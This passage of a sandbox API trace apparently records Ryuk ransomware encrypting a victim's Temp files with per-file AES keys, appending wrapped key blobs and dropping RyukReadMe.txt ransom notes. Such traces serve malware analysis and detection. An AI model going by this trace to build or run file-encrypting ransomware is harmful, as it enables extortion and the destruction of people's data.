(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0143.546] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=16384) returned 1 [0143.546] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=16384) returned 1 [0143.546] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x3ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.546] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0143.547] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.547] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0143.547] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.547] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.547] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x4000, lpOverlapped=0x0) returned 1 [0143.548] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0143.548] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x4000, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x4010) returned 1 [0143.548] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.548] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x4010, lpOverlapped=0x0) returned 1 [0143.549] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0143.549] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0143.549] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0143.549] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0143.549] CloseHandle (hObject=0x198) returned 1 [0143.565] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.574] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.574] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.574] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0143.574] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0143.574] SetLastError (dwErrCode=0x0) [0143.574] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0143.575] GetLastError () returned 0x0 [0143.575] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0143.575] CloseHandle (hObject=0x194) returned 1 [0143.576] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0143.576] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0143.576] SetLastError (dwErrCode=0x0) [0143.576] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.576] GetLastError () returned 0xb7 [0143.576] CloseHandle (hObject=0x190) returned 1 [0143.576] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.576] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.576] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HMYApNIvjLFSVrIyNb8.flv", dwFileAttributes=0x80) returned 1 [0143.576] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HMYApNIvjLFSVrIyNb8.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\hmyapnivjlfsvriynb8.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.577] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=2869) returned 1 [0143.577] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=2869) returned 1 [0143.577] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xa13, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.577] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.577] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.577] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.577] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.577] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.577] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0xb35, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0xb35, lpOverlapped=0x0) returned 1 [0143.578] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.578] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0xb35, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0xb40) returned 1 [0143.578] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.578] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xb40, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0xb40, lpOverlapped=0x0) returned 1 [0143.578] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.578] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.578] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.578] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.578] CloseHandle (hObject=0x190) returned 1 [0143.603] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.607] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.607] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.607] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.607] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.608] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\iclh6Au7b22.bmp", dwFileAttributes=0x80) returned 1 [0143.608] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\iclh6Au7b22.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\iclh6au7b22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.608] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=48199) returned 1 [0143.608] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=48199) returned 1 [0143.608] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xbb25, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.608] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.609] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.609] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.609] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.609] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.609] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0xbc47, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0xbc47, lpOverlapped=0x0) returned 1 [0143.610] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.610] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0xbc47, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0xbc50) returned 1 [0143.610] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.610] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xbc50, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0xbc50, lpOverlapped=0x0) returned 1 [0143.610] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.611] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.611] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.611] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.611] CloseHandle (hObject=0x190) returned 1 [0143.627] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.631] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.631] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.631] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.631] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.631] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\JFI9njJerEHVQTkSVe.m4a", dwFileAttributes=0x80) returned 1 [0143.632] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\JFI9njJerEHVQTkSVe.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\jfi9njjerehvqtksve.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.632] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=18481) returned 1 [0143.632] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=18481) returned 1 [0143.632] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x470f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.632] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.633] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.633] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.633] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.633] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.633] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x4831, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x4831, lpOverlapped=0x0) returned 1 [0143.633] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.633] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x4831, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x4840) returned 1 [0143.634] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.634] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4840, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x4840, lpOverlapped=0x0) returned 1 [0143.634] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.634] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.634] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.634] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.634] CloseHandle (hObject=0x190) returned 1 [0143.650] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.654] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.654] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.654] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.654] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.654] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Lg1u-SPtBC QIte.gif", dwFileAttributes=0x80) returned 1 [0143.655] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Lg1u-SPtBC QIte.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\lg1u-sptbc qite.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.655] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=91286) returned 1 [0143.655] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=91286) returned 1 [0143.655] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x16374, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.655] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.656] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.656] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.656] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.656] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.656] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x16496, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x16496, lpOverlapped=0x0) returned 1 [0143.657] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.657] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x16496, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x164a0) returned 1 [0143.658] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.658] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x164a0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x164a0, lpOverlapped=0x0) returned 1 [0143.658] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.658] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.658] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.658] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.658] CloseHandle (hObject=0x190) returned 1 [0143.674] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.678] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.678] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.678] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.678] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.679] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\lTL2tTUj.docx", dwFileAttributes=0x80) returned 1 [0143.679] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\lTL2tTUj.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ltl2ttuj.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.679] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=17171) returned 1 [0143.679] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=17171) returned 1 [0143.679] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x41f1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.679] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.680] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.680] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.680] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.680] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.680] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x4313, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x4313, lpOverlapped=0x0) returned 1 [0143.680] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.680] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, 